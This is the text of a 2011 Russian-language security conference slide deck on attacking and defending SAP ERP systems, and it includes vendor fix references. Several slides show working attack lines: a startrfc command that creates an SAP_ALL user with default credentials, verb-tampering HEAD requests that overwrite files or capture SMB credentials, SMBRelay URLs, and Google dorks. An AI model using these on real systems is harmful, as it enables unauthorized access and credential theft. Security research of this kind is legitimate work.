Sap risspa

Invest in securityto secure investmentsВзломать SAP за 60 cекундАлександр ПоляковТехнический Директор, Digital Securityat RiSSPA

яerpscan.com ERPScan — invest in security to secure investments 2

Доклады о безопасности SAP • Всего более 40erpscan.com ERPScan — invest in security to secure investments 3

Количество SAP notes за год • Всего более 1500 на сентябрь 2011гerpscan.com ERPScan — invest in security to secure investments 4

Публичная информация об уязвимостях • Всего более 150erpscan.com ERPScan — invest in security to secure investments 5

SAP не дремлет Из доклада Кристиана Виппермана (SAP) на последнем SAP TechED в Лас Вегасеerpscan.com ERPScan — invest in security to secure investments 6

Поговорим о безопасности • Что мы знаем о SAP? • Проблемы ответственности и контроля • Примеры обхода SOD • Уязвимости ABAP движка из интернет • Уязвимости J2EE движка из интернет • Взломать SAP за 60 секунд демоerpscan.com ERPScan — invest in security to secure investments 7

Что мы знаем о SAP Shut up And Pay Вставьте рисунок на слайд, скруглите верхний левый и нижний правый угол (Формат – Формат рисунка), добавьте контур (оранжевый, толщина – 3)erpscan.com ERPScan — invest in security to secure investments 8

SAP? Who cares?erpscan.com ERPScan — invest in security to secure investments 9

Постоянные новые угрозы • Тема атак на SAP стала • Администраторы не достаточно “модной” в security community осведомлены • Публикуется множество • Понимание безопасности уязвимостей только на уровне матрицы SOD • Ежегодно появляются угрозы • Системы усложняются Что делать?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 10

Как атакуют? 2007 – Архитектурные уязвимости RFC 2008 – Атаки на рабочие станции SAP 2009 – Бэкдоры для SAP, атаки на SAPRouter 2010 – Атаки на WEB-приложения SAP 2010 – Stuxnet под SAP 2011 – Архитектурные и программные уязвимости в ERP Что дальше?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 11

Последний год 2011 – Атаки на JAVA движок SAP 2011 – SQL инъекции в ABAP 2011 – Переполнение буффера в ABAP 2011 – Атаки Session Fixation в SAP 2011 – Атаки на SAPGUI 2011 – Спуфинг и перехват DIAG протокола Что дальше?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 12

Угрозы для бизнеса Шпионаж • Кража финансовой информации • Кража персональных секретов • Списки поставщиков и контрагентов Саботаж • Отказ в обслуживании • Модификация финансовой отчетности • Нарушение работоспособности доверенных систем (SCADA) Мошенничество • Подмена данных о платежах • Ложные транзакцииerpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 13

Как защищаемся?Бизнес-логикаНеобходимо защитить доступ между пользователямиРешение: Программы класса GRCУровень осведомлённости о проблеме - ВысокийБезопасность платформыНеобходимо защитить систему от неавторизированного доступа из внеРешение: Сканирование/Мониторинг/Тестирование на проникновениеУровень осведомлённости о проблеме - НизкийБезопасность кодаЗащита от умышленных и неумышленных ошибок разработчиковРешение: программный или ручной аудит кодаУровень осведомлённости о проблеме - Низкийerpscan.com ERPScan — Leading SAP AG partner in discovering and solving security vulnerabilities 14

Что происходит сейчас Ок, вы потратили XXX млн. $ на лицензию SAP GRC + XXXX млн $ на консультантов, оптимизацию SOD и привели красивый отчёт для руководства, что за 1 год количество конфликтов уменьшилось с 2389123 до ~10000. И в следующем году планируется уменьшить до 1000 А как обстоят дела с настройками безопасности платформы?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 15

Как проконтролировать безопасность столь сложной системы ?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 16

1001 Способ обойти SOD • Не диалоговые пользователи • Прямой доступ к таблицам • Безопасность сервисов типа Gateway и Massage Server и прочих • Хитрые настройки • Доступ из интернет • Уязвимостиerpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 17

Не диалоговые пользователи Миф: Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации Есть множество RFC функций для создания пользователя: Пример1 SUSR_RFC_USER_INTERFACE startrfc -3 -h 172.16.0.63 -s 01 -c 001 -u SAPCPIC -p admin –F SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES,12,r=SAP_ALL Пример2 BAPI_USER_CREATE1erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 18

Атаки на Gateway и Message Server • Атаки описаны в руководстве по безопасности SAP • Позволяют: – неавторизированно зарегистрировать ложный сервер приложений – вызвать зарегистрированный RFC сервис типа SAPXPG – зарегистрировать свой RFC сервис • Есть настройки, позволяющие элементарно закрыть уязвимости Если это так просто и очевидно, почему в 90% аудитов настроено не безопасно?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 19

Хитрые настройки Администратор выставил следующие настройки: login/min_password_uppercase = 2 login/min_password_lng = 8 login/min_password_specials = 2 login/password_compliance_to_current_policy = 0 login/password_max_idle_productive =90 login/password_max_idle_initial = 90 В чём проблема?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 20

Прямой доступ к таблицам • Чтение таблиц – через транзакции: SE16, SM31, SM30, SA38, SE38 – через RFC вызовы: RFC_READ_TABLE • Критичные таблицы: USR02 — хеши паролей SSF_PSE_D — ключи для SSO доступа RFCDES – пароли в открытом и зашифрованном виде ICFSERVLOC - пароли для ICF сервисов в открытом виде и ещё немного пока под секретомerpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 21

Доступ из интернет + уязвимостиerpscan.com ERPScan — invest in security to secure investments 22

Атаки на ICM (ABAP) Более 1500 сервисов с критичным функционалом 1) По умолчанию разрешён доступ любым пользователем 2) Для доступа к /sap/bc/soap/rfc не проверяется авторизация S_RFC 3) Используя пароли по умолчанию типа TMSADM/PASSWORD Как итог - полный контроль системы злоумышленникомerpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 23

Прочие небезопасные сервисы • /sap/public/info — информация о системе анонимно • /sap/public/icf_info/icr_groups — информация о приложениях • /sap/bc/soap/rfc — выполнение RFC команд удаленно, DOS • /sap/bc/srt/xip/sap — выполнение критичных действий • /sap/bw/Bex — просмотр критичных инфообъектов • /sap/bc/bsp/sap/htmlb_samples — тестовый сервис • /sap/bc/gui/sap/its/webgui — SAPGUI через WEB Нами изучено более 50 небезопасных сервисовerpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 24

Атаки на J2EE Engine NetWeaver J2EE = интеграция, управление, взаимодействие • SAP Portal • SAP PI • SAP XI • SAP Mobile Infrastructure • SAP Solution Managererpscan.com ERPScan — invest in security to secure investments 25

J2EE Platform Architectureerpscan.com ERPScan — invest in security to secure investments 26

Удалённый доступ Service Name Port Number Default Value Range (min-max) HTTP 5NN00 50000 50000-59900 HTTP over SSL 5NN01 50001 50001-59901 IIOP 5NN07 50007 50007-59907 IIOP Initial Context 5NN02 50002 50002-59902 IIOP over SSL 5NN03 50003 50003-59903 P4 5NN04 50004 50004-59904 P4 over HTTP 5NN05 50005 50005-59905 P4 over SSL 5NN06 50006 50006-59906 Telnet 5NN08 50008 50008-59908 LogViewer control 5NN09 50009 50009-59909 JMS 5NN10 50010 50010-59910 По умолчанию шифрование на всех портах отключеноerpscan.com ERPScan — invest in security to secure investments 27

Уязвимый алгоритм шифрования паролей в P4 • P4 - протокол, используемый утилитой Visual Admin • Все данные передаются в открытом виде • К сожалению (счастью), пароль закодирован Как он закодирован?erpscan.com ERPScan — invest in security to secure investments 28

Уязвимый алгоритм шифрования паролей в P4erpscan.com ERPScan — invest in security to secure investments 29

Уязвимый алгоритм шифрования паролей в P4 Удиви меняerpscan.com ERPScan — invest in security to secure investments 30

Уязвимый алгоритм шифрования паролей в P4 /* 87 */ char mask = 43690; /* 88 */ char check = 21845; /* 89 */ char[] result = new char[data.length + 1]; /* */ /* 91 */ for (int i = 0; i < data.length; ++i) { /* 92 */ mask = (char)(mask ^ data[i]); /* 93 */ result[i] = mask; /* */ } /* 95 */ result[data.length] = (char)(mask ^ check); /* */ /* 97 */ return result;erpscan.com ERPScan — invest in security to secure investments 31

Защита • Используйте SSL для шифрования всех соединений между SAP системами. http://help.sap.com/saphelp_nwpi71/helpdata/de/14/ef2940 cbf2195de10000000a1550b0/content.htmerpscan.com ERPScan — invest in security to secure investments 32

Взлом из интернет SAP системы доступны только из внутренней сети, о да, в самом деле? inurl:/irj/portal inurl:/IciEventService sap inurl:/IciEventService/IciEventConf inurl:/wsnavigator/jsps/test.jsp inurl:/irj/go/km/docs/erpscan.com ERPScan — invest in security to secure investments 33

Из чего состоит J2EE Engine SAP NetWeaver 6.4 300 web –приложенийerpscan.com ERPScan — invest in security to secure investments 34

Из чего состоит J2EE Engine SAP NetWeaver 7.2 1200 web –приложений, и это только в TRIALerpscan.com ERPScan — invest in security to secure investments 37

Раскрытие информации • Версия системы DSECRG-11-023,DSECRG-11-027, DSECRG-00208 • Логи и трейсы DSECRG-00191,DSECRG-00232 • Имена пользователей DSECRG-11-034 New • Сканирование внутренней сети через внешний уязвимый сервер DSECRG-11-032 DSECRG-00175 Newerpscan.com ERPScan — invest in security to secure investments 38

Раскрытие информации DSECRG-11-023erpscan.com ERPScan — invest in security to secure investments 39

Раскрытие информации DSECRG-11-027erpscan.com ERPScan — invest in security to secure investments 40

Раскрытие информации DSECRG-11-032 Host is not alive HTTP port Port closed SAP porterpscan.com ERPScan — invest in security to secure investments 41

Раскрытие информации DSECRG-00231erpscan.com ERPScan — invest in security to secure investments 42

Защита • SAP notes: 1548548,1545883,1503856,948851, 1545883 • Удаление ненужных и не поддерживаемых приложенийerpscan.com ERPScan — invest in security to secure investments 43

Межсайтовый скриптинг 15.09.2011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability 19.08.2011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS 19.07.2011 [DSECRG-11-028] SAP NetWeaver ISpeak – XSS 20.06.2011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS 20.06.2011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS 12.04.2011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS 12.04.2011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS 14.03.2011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS 14.03.2011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS 14.03.2011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS 14.03.2011 [DSECRG-11-010] SAP NetWeaver logon.html - XSS 14.03.2011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS 14.12.2010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS 14.12.2010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS 14.12.2010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS 14.12.2010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS 11.11.2010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS И это только те, что закрыты !erpscan.com ERPScan — invest in security to secure investments 44

SMBRelay http://server:port/mmr/MMR?filename=smbsnifferanyfileerpscan.com ERPScan — invest in security to secure investments 45

CSRF + SmbRelay = CSSR http://server:port/mmr/MMR?filename=smbsnifferanyfile Заставь нажать на эту ссылку того, у кого есть к ней доступerpscan.com ERPScan — invest in security to secure investments 46

Защита от CSRF Встроенное API для защиты от CSRF • Standard XSRF Protection. Вся работа реализуется сервером приложений (простые GET/POST) • Custom CSRF Protection. Обработка CSRF токенов на разработчике Есть множество мест, где эта защита не реализованаerpscan.com ERPScan — invest in security to secure investments 47

SPMLerpscan.com ERPScan — invest in security to secure investments 48

Аутентификация Declarative Programmatic Используя WEB.XML Используя UME Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmaticerpscan.com ERPScan — invest in security to secure investments 49

Декларативная аутентификация <servlet> <servlet-name>CriticalAction</servlet-name> <servlet-class>com.sap.admin.Critical.Action</servlet-class> </servlet> <servlet-mapping> <servlet-name>CriticalAction</</servlet-name> <url-pattern>/admin/critical</url-pattern> </servlet-mapping> <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource-name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint>erpscan.com ERPScan — invest in security to secure investments 50

Обход аутентификации Invoker Servlet• Можно вызвать любой сервлет напрямую по имени класса• Пример вызова - /servlet/com.sap.admin.Critical.Action• Порядка 30 приложений из 150 уязвимо (SAP ECC 6)erpscan.com ERPScan — invest in security to secure investments 51

Защита• Параметр “EnableInvokerServletGlobally” установить в “false”• Для включения опции только для конкретных приложений - note 1445998• Для SAP NetWeaver Portal – note 1467771• Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan web.xml scanner manually.erpscan.com ERPScan — invest in security to secure investments 52

Массовый взлом • I have a dream …….erpscan.com ERPScan — invest in security to secure investments 53

Уязвимость Verb Tampering <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource- name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> А что если попробовать HEAD вместо GET?erpscan.com ERPScan — invest in security to secure investments 54

Отказ в обслуживании Приложение Integration Directory HEAD /dir/support/CheckService?cmd_check&fileNameL=DEFAULT1.PFL& directoryNameL=D:usrsapDM0SYSprofile HTTP/1.0 Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети интернетerpscan.com ERPScan — invest in security to secure investments 55

Получение доступа к ОС Приложение Integration Directory HEAD /dir/support/CheckService?cmd_check&fileNameL=DEFAULT1.PFL& directoryNameL= smbsniffersniff HTTP/1.0 Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под управлением Windows.erpscan.com ERPScan — invest in security to secure investments 56

Полный контроль • Обнаружили секретный интерфейс для управления JAVA движком – Удалённое администрирование пользователей – Доступ к ОС – Выполнение произвольных команд – Выключение сервера • Установлен по умолчанию • Уязвим к Verb Tampering • Атака возможна без аутентификации из Интернет!erpscan.com ERPScan — invest in security to secure investments 57

Взломать SAP за 60 секунд ДЕМООООООООООООО!!!!!!!!!!!!!!erpscan.com ERPScan — invest in security to secure investments 58

Победаerpscan.com ERPScan — invest in security to secure investments 59

Защита • SAP note 1503579, 1616259 • ERPScan WEB.XML check tool • Отключение ненужных сервисовerpscan.com ERPScan — invest in security to secure investments 60

Итоги Проблема ответственности и контроляerpscan.com ERPScan — invest in security to secure investments 61

Будущая работа Конференции: • 11 October - HITB в Кула-Лумпуре (Малайзия) • 25 October - HackerHalted в Miami (США) • 25 November – ZeroNights в Санкт-Петербурге (Россия) Новости: • dsecrg.ru • erpscan.ru Cпасибо: • Дмитрий Частухин, Дмитрий Евдокимов, Алексей Cинцов, Алексей Тюрин, Павел Кузьмин, Антон Спирин. • Организаторам Risspa Опрос: • Тренинг по безопасности SAPerpscan.com ERPScan — invest in security to secure investments 62

ZeroNights — международная конференция, посвященная техническим аспектаминформационной безопасности. На конференции выступят известные экспертыотрасли из России, Европы, США, Индии, Сингапура и других стран. Главная цельконференции — распространение информации о новых методах атак, угроз изащиты от них, а кроме того, создание площадки для общения специалистов-практиков по ИБ.

Sap risspa

by RISSPA on Oct 16, 2011

Accessibility

Upload Details

Usage Rights

2 Embeds 80

Statistics

Sap risspa — Presentation Transcript

http://www.risspa.ru	79
http://ec2-176-34-245-108.eu-west-1.compute.amazonaws.com	1